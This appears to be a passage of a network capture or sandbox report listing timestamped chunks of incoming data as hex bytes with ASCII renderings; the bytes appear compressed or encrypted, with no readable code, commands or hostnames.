                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31064INData Raw: d7 9c 70 7e 64 2f f1 48 9f 4a 81 87 8d 1a 7b 12 92 d0 47 fc bf e5 1b 09 32 2f ac df 4c 35 60 35 5b ba 73 bb d7 a3 2d da 65 c4 4a 12 43 95 4c d2 1a 5f 3f 50 e8 12 ba 2f 43 36 64 19 95 99 ee 76 92 58 c5 0d c4 e6 6d b8 9a 73 5c cc dc 92 4e b1 f5 51 31 0b fd 8a cd 10 f7 d5 9f 69 8a 00 79 35 79 cb c3 d5 21 9c 1a 13 8a 59 46 c2 91 5a fd 84 e7 87 f5 55 65 3d ca b2 f1 b8 54 79 92 11 35 4a 1d 0c 8d 8b bb 8a de c4 57 e5 21 3d cb 33 b9 a7 55 1a 2d e9 4b 15 6a 3f da b9 c8 89 8f a3 34 74 ea 60 e3 49 6f 13 ed 6c b1 c0 31 98 62 4c 11 f9 a8 82 36 da 26 0d 33 7d 43 2f f8 5d 0f 34 5a cb 2d 3c 74 81 b5 d9 69 c8 d1 40 54 da 62 80 38 57 93 08 67 e5 80 07 8d ae 02 d3 8a 72 7c cc fb a2 c1 f2 79 35 b3 61 ee 29 46 eb e7 c7 e0 ed df 8b 70 f3 45 3e cd cd 50 5d 66 18 c7 d4 e2 3a df
                                                                                                                                                                                                                                    Data Ascii: p~d/HJ{G2/L5`5[s-eJCL_?P/C6dvXms\NQ1iy5y!YFZUe=Ty5JW!=3U-Kj?4t`Iol1bL6&3}C/]4Z-<ti@Tb8Wgr|y5a)FpE>P]f:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31080INData Raw: 63 0c 0a 7b a0 93 d3 9f af 74 23 95 fe 1b 38 5b 94 a1 8e 5c 5f 54 81 c4 dd 43 c0 97 73 d9 ee f1 01 e9 dd 47 c8 f2 09 25 50 c4 57 21 f2 5a be f4 02 d6 e8 e7 7f 6a 80 81 cb 66 a4 3e f2 41 e5 ea a8 a7 63 f8 98 50 3c c2 b0 07 fa 7b ea 13 fa e4 4a 64 8d 83 73 f1 f1 50 cd bf 6b 05 44 6a 87 48 70 e5 08 b9 80 77 82 74 0b c6 a5 89 cb 74 4e 91 62 a9 19 77 64 2d ce ef 47 06 be d9 f1 6b 46 2c 05 26 96 82 91 be e1 92 a2 b2 41 7f 76 6b bf 38 f7 c6 56 85 c5 92 f5 4b 58 6e 74 0e 6b 83 24 ed 02 ef 3b ae 3a 7c 30 7e f7 2d aa 6e a7 b2 62 9d 37 71 70 dd 92 2e 7d 46 c1 19 1b 82 29 29 d3 ed e2 30 16 b1 e5 8c 55 e5 d7 46 55 21 8b 50 2a 6a cc d1 93 6a bd 41 55 69 1b c5 83 1b aa 75 a2 a6 a1 e3 5c 9f f3 95 d7 eb 76 01 7c 84 8b 0a 3d 5b c3 ec b5 01 96 59 5e 5e 96 5b 34 08 c9 81 fa
                                                                                                                                                                                                                                    Data Ascii: c{t#8[\_TCsG%PW!Zjf>AcP<{JdsPkDjHpwttNbwd-GkF,&Avk8VKXntk$;:|0~-nb7qp.}F))0UFU!P*jjAUiu\v|=[Y^^[4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31096INData Raw: 77 3c d1 91 4b 9f 34 6c 36 9d 3e 3a 87 ac 39 4a c6 2a 96 46 64 c2 b6 e8 33 a4 f5 7a b9 48 19 ba 9f c1 1d 42 91 0f a1 dc 12 1b bc 27 98 c2 36 5b 25 a0 2c 9e b3 27 ea c0 f3 3d 5e f5 5f 84 39 4b c7 31 19 55 f2 f2 63 2c 9f 06 50 0d 50 e8 c1 3c a6 2d f9 4d 3a 6c 5a db 89 39 cf 67 a3 45 e9 0f 32 54 d4 a2 e4 92 a1 76 58 85 f2 b5 8e e5 00 4d d6 85 de 19 a2 24 59 c9 73 16 af 01 7f a9 6f 53 e8 87 a0 c9 b4 df 84 77 44 14 f7 c6 49 5f de 11 1c d0 64 95 c0 38 a9 33 e2 aa 40 fe b3 97 eb 6c 77 a6 40 3f 0c 49 b0 fe 7d 78 ff 1a 26 e7 79 bd b0 e0 fd 34 57 37 c0 6d 2e 71 2c 30 0d 49 ac 8d 34 97 1b be 0b d6 60 1a ad 3c 0c 34 29 b6 27 d5 c8 b3 eb 2f 09 8e 4f 78 c6 18 e0 e4 1b 69 aa f4 a7 ba 6b ce 35 0c 81 30 78 14 83 6b a8 90 04 b8 e2 f4 3a 0a dd b7 4e 27 55 dd 1c 66 3d 89 bc
                                                                                                                                                                                                                                    Data Ascii: w<K4l6>:9J*Fd3zHB'6[%,'=^_9K1Uc,PP<-M:lZ9gE2TvXM$YsoSwDI_d83@lw@?I}x&y4W7m.q,0I4`<4)'/Oxik50xk:N'Uf=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31112INData Raw: 84 4d de a0 ca b3 4a 19 eb c3 1e 18 2a eb 40 23 c0 ba a4 ff 09 3d d9 4a 91 55 a1 1b 59 9a 55 ef 83 df 7e 92 62 f1 4a a1 50 ee d4 34 b2 9a f3 27 19 e2 75 6b d7 3f c9 e8 a9 73 65 ca e4 64 0a 6d 04 b1 fc 36 a9 ec 0c de dc cc 3a 4e ae 8e ee d7 09 96 74 f2 01 b6 25 c7 4e 2f 13 ea 6f c8 86 07 45 55 4f 35 e0 4c 12 ff 17 28 ea cf a8 28 dd 08 0f cf 37 d7 37 f3 7b 5a 86 66 37 64 f5 d9 3e e4 24 6f 83 80 96 0a 87 bd df e0 4b 14 17 ca 3c 55 20 da 49 ed 84 dc 74 76 97 79 e5 e0 44 70 94 e0 9f 54 e0 ae 43 07 e8 56 aa 68 54 25 54 44 28 de 55 f2 5d 11 46 77 31 00 bd 67 9a 66 3d 1c 69 82 57 bc 96 cb 62 48 e9 02 3e 84 d3 31 f5 f2 f2 5d 85 c7 22 82 ca c0 7f a8 0a a5 b6 7d 01 fe 92 dd 90 ec 53 9a 0e ad 31 1e 62 df ed 83 31 6a 63 81 40 e9 ae 13 81 dc ec 6d 56 68 ca f3 09 f6 65
                                                                                                                                                                                                                                    Data Ascii: MJ*@#=JUYU~bJP4'uk?sedm6:Nt%N/oEUO5L((77{Zf7d>$oK<U ItvyDpTCVhT%TD(U]Fw1gf=iWbH>1]"}S1b1jc@mVhe
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31128INData Raw: 9d 24 b3 4d 7e f8 1e ce 04 6c a8 b6 5d d7 b4 6e 44 58 e2 0a c3 5c 61 09 3e cb 7d 50 af e5 d5 a1 0a 28 5f a9 aa 98 48 a4 7f 58 91 89 05 a6 df cc 32 5a a0 60 7c 2b 01 42 a2 54 cb f3 13 73 11 07 49 b0 2c b9 30 41 d0 11 c9 95 c7 39 de 3e 01 43 73 c6 fa 7a d7 a3 46 f4 c1 34 9f 35 f3 5f dc 26 f0 09 2e bf b0 34 c3 b3 17 aa 24 2a 67 e2 f8 69 16 81 da 96 c4 4e 15 b7 3e 4f 46 e3 57 ca 9f ec a9 b7 86 7d c9 b1 6a 07 99 68 d8 2c 9e 33 2c 27 c8 4a 77 ce 3c ef a2 da 2e b7 25 04 6d 98 a6 68 b9 bc 26 97 1f fa af 78 37 12 fe d6 e2 09 7c 0b 93 c9 60 91 b2 52 eb b7 74 9c 14 1a 80 58 4f b8 03 b1 9d 96 59 c0 88 d5 f1 56 83 48 8d de 83 36 b3 ca 6e 53 03 88 d6 2b 3b 10 42 16 63 c8 31 72 bb 40 33 21 db 81 9b 21 69 da ec f8 5e 28 75 40 09 6e cb 37 2b d1 fa 4d 45 d9 7d 46 38 c8 2e
                                                                                                                                                                                                                                    Data Ascii: $M~l]nDX\a>}P(_HX2Z`|+BTsI,0A9>CszF45_&.4$*giN>OFW}jh,3,'Jw<.%mh&x7|`RtXOYVH6nS+;Bc1r@3!!i^(u@n7+ME}F8.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31144INData Raw: 87 4d 93 21 31 6f bd 1c 8d 4d 68 15 87 36 8b 11 35 0f 46 71 a0 a5 46 0e f0 0a ec 69 a3 41 3a 3b 0c 7c 2d 26 e2 78 6d 48 63 a2 9a 5c c7 e2 ff 5a bb 57 c6 c9 2e 84 28 0a 81 ee 2a ec 93 c3 b7 02 d1 c6 ff 0e db d2 24 c3 9d 03 b6 be 39 a4 28 e7 49 46 20 b2 7c ab 81 cc 07 51 e3 a1 f3 34 1a 14 20 72 c8 e5 61 6a f6 40 8b ae f2 64 69 42 cd c5 dd c3 15 36 a5 d2 74 3c ad 09 41 57 16 92 3f 57 85 56 4e 52 5c 54 2b df 0d f9 60 c8 20 c8 c6 85 5f ea e6 82 82 1d 74 60 62 3c 55 4f f6 d3 a1 59 e9 b4 65 35 4a c1 26 8b 2f 5d 28 d1 eb 53 74 9c f2 e7 70 0b 5e fa 1b 6f 54 27 14 f5 96 0d ce ee 30 80 31 3a e3 44 4a 10 39 cc 38 89 e2 2f 5f 26 cd fb 38 3d 5d 9e 5b 92 ae 4c be 3f 1f 02 3e ba 3f 4f 24 1f 24 a1 f9 29 44 80 49 f5 9e 34 52 97 6e ba 4e 51 28 3f c0 01 c9 67 2a 6a 40 e0 38
                                                                                                                                                                                                                                    Data Ascii: M!1oMh65FqFiA:;|-&xmHc\ZW.(*$9(IF |Q4 raj@diB6t<AW?WVNR\T+` _t`b<UOYe5J&/](Stp^oT'01:DJ98/_&8=][L?>?O$$)DI4RnNQ(?g*j@8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31160INData Raw: 39 83 9c 5a 02 b8 70 3e 16 e6 0f c0 a9 12 9a f6 fc a6 bb 9f e2 de ee 13 82 56 0a 40 2f 31 0b a1 25 6f 3d 4e cf 12 d8 b9 00 80 48 87 5f 8b 42 6d 25 01 be e2 14 61 f5 5d 26 64 cc f4 bc 9d 83 7e 6e 27 03 51 66 5c 87 2b 81 e7 e7 5f 96 bc 25 b9 ed 0b 73 62 db 65 62 6b c6 a0 ff c3 1c be bb 68 5d e9 8d b2 3c 80 43 14 2c 5d f0 e6 0c 34 7e f0 f7 a5 25 aa 07 0b 93 6f fb 39 c8 46 45 fc b1 80 53 94 35 20 ef 59 4f e1 ef 14 72 88 6d 4e ff 1b db 57 b1 df 32 00 1a c2 1b 22 8b b7 62 3e a4 48 eb 0d f7 5a 5e 40 4c a3 e8 15 95 bf 3a b8 40 4d 9a c6 f9 3c d4 81 a8 46 d4 1a 27 01 4e 4a 4a 5f fb 30 74 6a 25 7c c5 3b d8 b7 1c 88 49 ff 9e 63 67 f6 e6 71 90 57 90 02 3c 03 e4 08 3a b6 f1 fe c0 fe d6 10 bd 0a 88 89 a8 9d 79 80 8e 7e 77 90 53 b1 e2 10 73 63 c1 2a d7 94 94 a2 bc 1b df
                                                                                                                                                                                                                                    Data Ascii: 9Zp>V@/1%o=NH_Bm%a]&d~n'Qf\+_%sbebkh]<C,]4~%o9FES5 YOrmNW2"b>HZ^@L:@M<F'NJJ_0tj%|;IcgqW<:y~wSsc*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31176INData Raw: 79 ce f0 43 88 69 e9 98 3f 01 92 61 ba 51 73 f7 e7 c3 00 41 ea a9 7b d6 40 dc ea fd fb 5f 44 3f 89 35 ee 35 a8 42 16 92 84 3b 49 5e a5 d1 b7 5c 64 03 2e 01 16 18 c6 a8 3d 69 3a fd 91 9f 03 d5 79 60 94 eb 68 c3 c9 59 76 24 4f c4 50 74 de 81 ba 9a 89 74 cc a9 07 3c d2 84 b5 80 3f 10 e8 11 53 c5 bd 99 ec 5b fe 96 ec a3 6d 9a 6f b0 4b 3b 45 69 8a df 60 f3 85 0c b8 89 55 77 05 d1 0a 1b 6e ac 84 10 e3 7a e9 c5 11 0a 7a 06 d0 e4 69 31 5a a5 d8 d7 33 cc b7 52 3c e0 10 4f 4f 72 59 fe af d9 ed 35 16 dc 3e 99 05 d2 c6 cc fc d7 6d 01 b8 f0 a5 32 f8 4c f5 3d f4 c7 20 65 5a e1 94 6e 2c cb 88 e0 ff ee 1d 88 69 f5 e2 60 b9 4c 6a e5 7a 91 47 82 e8 46 6c d0 0b df 50 eb 1a 96 52 02 b4 24 a9 60 09 0a 5a 68 c8 de 53 00 8d cd 2d 61 1b ee 2d b1 aa 03 5c c4 8d ee f5 a3 a1 cf b3
                                                                                                                                                                                                                                    Data Ascii: yCi?aQsA{@_D?55B;I^\d.=i:y`hYv$OPtt<?S[moK;Ei`Uwnzzi1Z3R<OOrY5>m2L= eZn,i`LjzGFlPR$`ZhS-a-\
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31192INData Raw: a3 50 81 ac 84 e4 58 fd 7c 03 5b 96 12 be 77 82 07 4c 14 99 35 7b 21 c7 c1 d4 82 97 f7 3f f1 08 b0 a0 c8 67 ef f1 93 b4 46 93 8a 12 15 3b d1 69 79 2b e8 b8 b4 b4 e4 b8 8a 6f b0 48 c3 eb 8e 41 13 d3 93 bb 50 d0 30 db ad 83 fc 04 75 a7 56 61 28 c8 ce eb dd 63 ce ef 54 9e d7 4e 83 f6 3b e7 cd 23 c8 5a 0d c8 b5 28 f4 09 65 eb 27 9e cd ff cf 7e fd b5 05 72 e8 0d 81 f6 fb 40 e4 29 73 04 bf 43 6b 98 5c 53 b7 b6 40 e0 33 94 56 a5 7a c0 ff 05 6f 24 89 dd 0b 42 e8 40 8f af 9c 90 40 40 a5 1f b2 e0 f3 ac b8 96 6b c2 9b d2 33 06 9b eb 40 17 74 db 19 7b 3b d9 63 c9 fd 44 69 7c 96 d9 63 82 4b 51 31 8e 50 fd b9 7b d8 78 4c 0c 64 de 12 9f 8e fe d7 98 86 b5 c3 e2 42 3a ca 82 91 01 21 99 f3 17 8c b8 a8 b5 6e c6 5f dd f4 05 b3 d2 df e4 f7 6e e5 a8 5a 02 94 4e d1 2c f2 5a b6
                                                                                                                                                                                                                                    Data Ascii: PX|[wL5{!?gF;iy+oHAP0uVa(cTN;#Z(e'~r@)sCk\S@3Vzo$B@@@k3@t{;cDi|cKQ1P{xLdB:!n_nZN,Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31208INData Raw: 11 ef a4 20 d8 b2 c0 a8 17 01 19 80 5e f0 1b 43 95 93 b9 f5 03 7d b0 0d e1 55 81 eb ba 02 d2 d7 65 ce b8 86 78 c1 af 7d e3 11 e6 76 f6 1f d7 96 97 d1 f0 1c 8f c8 49 f7 03 66 df 8a 31 15 9b ea 36 cb 78 52 6c af 45 73 69 44 e3 90 f5 e6 d5 c3 6d 4f 68 b5 92 ac b4 75 bc c4 d4 00 ea 36 41 f4 e5 7f fa 2f 0d 77 ea 50 ec 19 5f 0b a9 2a 48 1e d8 29 02 06 b2 02 ff 16 92 fd f0 9b d2 d5 a2 46 25 f4 a9 fc 16 03 bc 8c 39 ab bb 83 c8 96 24 10 cf 79 1e 23 ef c4 11 7d 1c 86 17 fd fe a3 f5 28 cc e1 be bd ed 63 fb 38 ba 81 0a 4d be 0a 7e 52 4b 41 bf b6 d5 04 9f 23 c9 93 ed 1f c6 f7 62 f5 67 d9 ba c7 87 23 19 40 4e 83 a6 bb 22 fb 22 25 08 1e 3b e9 0a 0d 4c d4 66 65 d6 ad 2d 82 37 b7 9e c1 95 07 51 7d 74 75 c2 ce 82 af e7 9f 99 02 1b 5f 5e b1 b7 c1 ae 34 8c 92 dd 12 22 cf 6d
                                                                                                                                                                                                                                    Data Ascii: ^C}Uex}vIf16xRlEsiDmOhu6A/wP_*H)F%9$y#}(c8M~RKA#bg#@N""%;Lfe-7Q}tu_^4"m
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31224INData Raw: 5c 72 f9 a0 a6 0c f7 1d 52 f5 7a a7 99 90 76 76 e6 29 52 62 ca 29 be a8 26 b1 38 37 6c 5a 18 97 11 bd 0e ff 14 d8 a7 30 a8 b9 6b 95 6a 4c 34 e1 91 43 f7 49 a7 74 23 82 89 e7 8d 76 73 b7 09 15 9b 39 5f 30 a9 96 01 6e 62 45 85 a6 de 86 8f d7 dc 67 7d fa 7c 8c 2d 3e 3e 26 63 68 01 c2 9f 90 c3 ad 3e a4 fc 0e 74 2a da 90 4a 2e a2 6f e3 d9 05 1d 11 ca 84 00 36 09 3d fd 6d 38 68 d5 39 3e f5 45 e4 6a 81 48 a8 81 f3 a7 a5 c8 aa 14 c6 19 9a 61 da 26 5e 91 75 af 56 19 0b 1f 51 66 b8 0d 42 d0 9e 2e b0 74 33 df 00 92 09 17 00 83 36 8f 26 a7 35 fe cd fc d8 dc 5e 90 62 1a 4c 7c e2 2d cd af 89 13 30 2d 69 48 a3 6a 7f 1f 5f 51 d8 fd aa 05 de c7 7e ac ea 8b 14 46 8d 2f ff 0d 85 d7 1c 39 e5 1a 10 16 e4 2d 10 cf d6 cf e8 c7 db 7a c2 b0 87 95 dc 08 09 44 b3 3c b6 5b e5 b9 55
                                                                                                                                                                                                                                    Data Ascii: \rRzvv)Rb)&87lZ0kjL4CIt#vs9_0nbEg}|->>&ch>t*J.o6=m8h9>EjHa&^uVQfB.t36&5^bL|-0-iHj_Q~F/9-zD<[U
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31240INData Raw: 24 2a 53 1b 0d 20 2c 1f e0 f1 04 1d fe 96 4c 38 56 64 49 02 08 6b 33 88 2f e1 35 3f ee 01 d3 bc c2 d1 7d a4 59 e5 14 54 d9 5a 25 71 75 e6 73 05 d0 b0 b0 a1 9e b8 67 a5 68 99 0a b2 6b eb 11 61 6b 77 eb 5e 38 88 fd f0 c6 b4 8b b3 33 06 ac 53 73 79 de 23 73 37 97 fb 4b 93 1b 70 44 6b a2 de e5 28 3e 6f 95 60 bd d6 b6 b7 e5 12 2a 37 be a7 6e 5a a8 f6 28 98 32 f1 2e 88 4f 89 49 0c e6 30 21 4b 89 55 b6 7e 7f 4f d5 7a 2f 6f 4a b6 db 5d 98 0f 8e d9 10 b8 12 e4 2e 00 2d 9e bf 91 a2 4e 72 aa 97 64 5a 0b 3d 2c 77 31 d5 37 97 0a 55 87 ef cb 35 63 a5 cc c0 24 92 74 fb c6 6e ee 3d d4 cc 8a 77 58 5d ae 36 8c e4 bb 5c f5 4a 52 e9 ed 5f 12 07 34 17 e8 00 06 bb bc 5a 14 f0 c8 aa fe 5b 8b 55 ee 09 b5 8d 09 56 81 8e cb 01 59 fb 85 aa a8 41 2e b8 e7 f9 2a c9 7a e4 0e aa 36 74
                                                                                                                                                                                                                                    Data Ascii: $*S ,L8VdIk3/5?}YTZ%qusghkakw^83Ssy#s7KpDk(>o`*7nZ(2.OI0!KU~Oz/oJ].-NrdZ=,w17U5c$tn=wX]6\JR_4Z[UVYA.*z6t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31256INData Raw: d9 3c ef 29 43 2e 6c 2b b7 c2 bc c7 57 05 5b b9 95 c4 38 23 70 54 c7 28 73 d3 42 24 89 c3 29 77 a5 14 e6 d7 81 43 e2 78 45 4e cc 31 68 3d 3b db 47 f5 30 e9 a0 51 96 cc 7e 15 5d eb d7 a3 17 2e 4a b4 cb ef 23 ba 68 25 06 16 4a 67 3b 36 72 26 36 3b df de 39 03 f1 ff 56 9d 01 a0 c2 60 70 d8 8c a1 63 59 74 50 8f f6 c6 c8 3e 34 c6 f1 f8 ab 3c 46 ed 03 62 71 a6 41 7c 12 f4 f2 20 a4 1b 31 5d 2c 60 9a 92 aa 96 c2 a5 f6 de 77 a9 97 91 63 49 8a 2e bb 54 0a 9f 92 e8 e6 de 08 74 6a f9 e9 61 69 69 8e ab 1f 8a d6 fc 28 ae 5a 21 d6 01 1d 1d 6b 93 e1 47 14 f6 a2 44 66 26 b3 6f 81 7a 11 a1 73 af 12 93 ba ef 5e e8 41 92 a9 73 76 52 58 87 56 28 29 ea c4 b7 a3 be 8a d1 ee 0d 32 2b 4f 19 76 8b c3 9e bd 38 6f 1d 93 94 c0 bf 82 c1 32 ee 3c 1c 7b 7e ff 3f 53 fd a3 76 87 df 62 91
                                                                                                                                                                                                                                    Data Ascii: <)C.l+W[8#pT(sB$)wCxEN1h=;G0Q~].J#h%Jg;6r&6;9V`pcYtP>4<FbqA| 1],`wcI.Ttjaii(Z!kGDf&ozs^AsvRXV()2+Ov8o2<{~?Svb
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31272INData Raw: 02 46 bf 24 62 6d c5 3c 2d ee f3 e2 bd bf 25 3e 1e 7a 4e ba 99 2f 11 1e 99 1c 6f 0c 55 ef e4 a8 b7 f1 03 d1 92 80 78 a3 e9 8e d2 bf 28 00 86 81 7e 0e 08 79 40 7f d4 70 c4 f7 c2 c3 0d 4e eb f9 78 07 a5 4a 89 2c ce 63 bd 74 36 1b f2 79 42 33 08 36 e2 5f fb 9b 3e 2d 2d 72 9f 74 1a 14 fd 72 da ab 14 49 ae 3e a0 93 31 71 88 2b b1 e0 ec e9 f8 a7 e9 59 84 ea eb fb 39 0e a4 80 2c b2 b4 5e 77 6d de 94 d3 35 e8 f8 26 52 29 f7 86 61 f6 2b 19 49 76 cc fb 01 c8 68 73 f2 57 72 a9 91 5c da b4 e2 6c be a7 eb db 73 df 09 9f 97 76 ff 7c 6b 64 1a ff c2 39 f6 57 7b 27 d8 09 1c eb 6a d3 92 30 4b 51 58 b7 b2 98 d8 64 0f 7f 74 20 5d 52 02 f5 4d d1 93 ca 4d 79 b9 e9 b4 1a be e3 c2 72 f3 39 53 ac b7 f7 9c 62 ac ff 9e 83 b5 fb ab 1b 09 0d 1e 59 ad 76 f6 12 06 dd 7e 1c 25 d5 c3 64
                                                                                                                                                                                                                                    Data Ascii: F$bm<-%>zN/oUx(~y@pNxJ,ct6yB36_>--rtrI>1q+Y9,^wm5&R)a+IvhsWr\lsv|kd9W{'j0KQXdt ]RMMyr9SbYv~%d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31288INData Raw: 26 48 a8 71 6b 90 c9 1d df a4 03 db eb 2c 75 e3 45 af 1d f4 f1 50 dc 35 80 ff 7b be d8 52 b3 53 7f 12 9a f8 72 8f ea 40 9f 36 2a fa 94 0f c3 f3 6b e8 10 6b 3f 2b 66 18 e0 5b 11 64 b5 2a 85 1b 2b 2f 6a 88 4c c3 a7 b7 b8 81 7b a7 86 b5 d7 c3 e2 be 0a 9c 8c de 4f 85 83 c1 51 11 59 0b 8c ec 62 d4 b5 60 96 1a fb 35 b2 9d 3a 68 40 ff cd f0 14 f0 79 b6 88 e2 15 39 69 58 f8 9c 92 2f 4a 3d 28 12 95 44 ea 92 21 68 b3 7e 37 05 a4 8a d6 5f 8b aa e5 48 15 a2 51 5d 60 02 0a 59 ec f9 bd 85 56 6f df 55 65 8b 5b 0e e1 6d b4 28 a7 b4 aa bb c9 42 b1 41 93 33 26 ca 91 9b 17 e3 01 4f be 0e 1f f1 62 0e 42 df dc fd 44 b0 84 56 bc 84 07 01 cd 26 96 1d 15 11 0b 6a be 7d 3b b9 eb c2 e7 3a 5f 8f 4a a6 5a 7f c9 c3 39 e3 f2 50 02 63 83 81 d6 b1 0b bc 08 36 d4 b7 11 bf fe 62 e4 09 e8
                                                                                                                                                                                                                                    Data Ascii: &Hqk,uEP5{RSr@6*kk?+f[d*+/jL{OQYb`5:h@y9iX/J=(D!h~7_HQ]`YVoUe[m(BA3&ObBDV&j};:_JZ9Pc6b
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31304INData Raw: 0c 56 1f be 51 12 1b d2 83 6c d7 46 69 f8 07 3f f8 3b 95 6a 85 f1 66 6d dd d0 3a 01 ca 87 86 f0 c1 c5 37 26 43 7e a1 96 ec 23 c7 17 f2 6c 58 cb 23 2e f3 75 6e 8b 9b 8b 13 43 b0 9d 7f 8d e6 b4 8d 37 ae 14 16 4f 3e e4 2f 72 07 ef 7c 12 4f c0 42 4b 20 88 bf a8 2e 64 e1 74 39 e0 9e 8a 19 a2 65 38 0b 56 27 8c 85 58 54 0f c2 ae b3 9e fb 4f 2f d1 19 53 43 0f 44 95 2a 07 15 bf 61 15 e0 8b 56 e4 40 01 1b 8a 6e d5 fc ed 71 67 08 b6 fa b1 70 b6 38 fd 1a 9a eb 63 40 77 42 b7 91 b1 6e cb e1 cc 36 06 21 22 f3 50 c9 49 ca 80 2a ac 8a 08 a8 72 b0 03 64 b5 21 6f 29 e2 b0 21 85 34 80 c9 ce eb 3d a1 44 53 72 c8 ea 8c b3 49 55 7e eb ec 70 f6 6d 19 43 93 60 9c ae 1c 1e ee 1e 6d 08 83 85 ee 25 57 55 db 9c c0 79 d4 80 1d 60 e2 bc 7c 22 70 0c b6 4e 86 f7 4f 60 b2 ad fc 67 82 6f
                                                                                                                                                                                                                                    Data Ascii: VQlFi?;jfm:7&C~#lX#.unC7O>/r|OBK .dt9e8V'XTO/SCD*aV@nqgp8c@wBn6!"PI*rd!o)!4=DSrIU~pmC`m%WUy`|"pNO`go
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31320INData Raw: 07 be ed ef 04 f7 75 60 61 60 95 03 f2 90 46 0b 2d bc a6 f3 4e ee f5 80 93 88 6f 5f fa d8 f7 2e 7c b4 13 b2 24 4d 24 c0 39 5b 6a a7 2f 50 30 2d f4 55 3e 0f 88 ef f1 29 ea b9 a0 30 90 1b 33 fb 7b 54 1c 6e 53 48 7f 00 de 0d bd b4 e0 f7 7d 40 06 e0 2f dc b1 84 ba 3d a7 71 5c 57 4f a4 cb 29 3b b0 13 9b 4b 2a 17 58 f9 cb 6f 2a 3d e4 2a 75 04 96 7e d3 ab ac 65 ce f8 8c 5c 08 5a d5 43 2a 4f 22 15 93 a2 22 3b 00 3c 27 77 aa 1c 35 6b ea ef f4 33 e3 f2 ec d6 ed 53 70 5a a6 d6 53 39 83 46 be aa 5f bf 6c fc 15 16 37 31 2f 4d 3b 58 3d 41 41 e7 de 46 95 04 90 e1 9d e9 4f 9d b3 cd d5 0d 89 da 24 aa 39 de f3 be fd 1a 94 bf a2 f8 d5 75 fe eb 99 b7 bb 66 1b 95 5d b0 a4 32 9f 3d 77 38 d4 cf 5a 68 62 dd 13 ef 25 3e 53 56 3c 7e 0d d6 96 38 14 df 14 0c ea be 63 f1 10 48 32 02
                                                                                                                                                                                                                                    Data Ascii: u`a`F-No_.|$M$9[j/P0-U>)03{TnSH}@/=q\WO);K*Xo*=*u~e\ZC*O"";<'w5k3SpZS9F_l71/M;X=AAFO$9uf]2=w8Zhb%>SV<~8cH2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31336INData Raw: e4 ed 5a 7e 3f 4d 19 89 bc 8d 85 61 6c 21 12 29 a8 93 4b e6 51 72 de 25 ca 43 e4 88 b1 59 e0 5e a7 e1 15 98 55 6f ac 6c 8d c1 2a 06 57 32 e9 90 d9 71 95 87 34 66 3e 92 62 6d 54 78 35 86 ef 64 eb d5 37 9c 9f 2d 65 01 19 39 b1 f4 ef 9f 5c cc 9a a7 3b 8b 12 af c6 aa f4 37 89 8a 6d b1 ad bc ab 45 d5 ea fe d3 df 8f d5 9d ae 40 24 2c 01 06 8b 55 21 e1 61 d4 02 51 09 dc 66 b3 a5 4e 39 f4 ad b0 8f 12 44 1e 1f 55 bf 7c 84 f7 f4 f8 84 2d 5d b0 c9 9e 5f e8 47 ae dc db 96 6e 10 18 82 74 d5 aa 2d e8 d3 7a 7d 92 f1 dc 5b 6e d9 cc b7 04 b6 dd 44 8d 91 89 e7 c3 93 49 cc a4 a7 27 c1 e6 6b 9b cf 79 46 94 3c 8f a8 e1 73 e0 04 14 02 b5 fd 4a 8e 72 cc e3 73 d2 f4 30 d3 95 87 60 db f5 0d cd 4c 71 2f 7e 0e ff 6c 07 be 8b f2 63 0f a1 8a 7a c1 b8 1f 26 f3 6e 7c 0e 6d d8 b4 f2 9d
                                                                                                                                                                                                                                    Data Ascii: Z~?Mal!)KQr%CY^Uol*W2q4f>bmTx5d7-e9\;7mE@$,U!aQfN9DU|-]_Gnt-z}[nDI'kyF<sJrs0`Lq/~lcz&n|m
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31352INData Raw: 19 e4 15 42 99 79 dc 1d ad a3 be e9 57 23 f7 0b 0f e1 ff a4 30 ed 50 e5 90 d1 33 91 05 30 8a 78 3e 61 1b 00 36 a7 8f 5d ff 82 4a 09 de 46 eb 27 71 c8 34 b6 09 37 2e a8 90 02 ba 92 77 a4 0a c1 c4 95 a5 5e 81 ce 8b 21 50 0f e8 04 ff 61 c1 bd de 69 38 ea 84 ec b4 e1 13 4d f5 4a 50 e4 38 83 c6 c2 4f 2c 4c 99 d8 23 d6 c8 ab e7 b8 e8 44 cf 17 6f e4 ed 37 4a 8b 29 e1 f2 b5 9a fb 93 36 a8 f0 4b 5a e8 84 3f 56 f3 7c 8a 2c 8a 0a 6b 71 ee b9 d1 08 31 ae d9 2b c4 04 99 01 95 0a d1 55 a1 27 09 d4 6b 7d 60 23 51 ef b2 d5 4b 6a 6f 51 a4 a8 97 11 5c 00 5f 85 59 c7 63 63 43 78 20 40 1c 4b ed 3e eb e4 be 1d 34 44 49 8f 0b 43 c8 2e 27 ec 10 80 76 b2 1e 3f bf 43 51 1d dc ae cb 98 ad 51 e7 11 d3 85 be 2a af b5 b3 6f ef 84 bf b6 29 97 87 2b 11 68 0a 40 bb 3d 3b 59 5b 0e a7 a5
                                                                                                                                                                                                                                    Data Ascii: ByW#0P30x>a6]JF'q47.w^!Pai8MJP8O,L#Do7J)6KZ?V|,kq1+U'k}`#QKjoQ\_YccCx @K>4DIC.'v?CQQ*o)+h@=;Y[
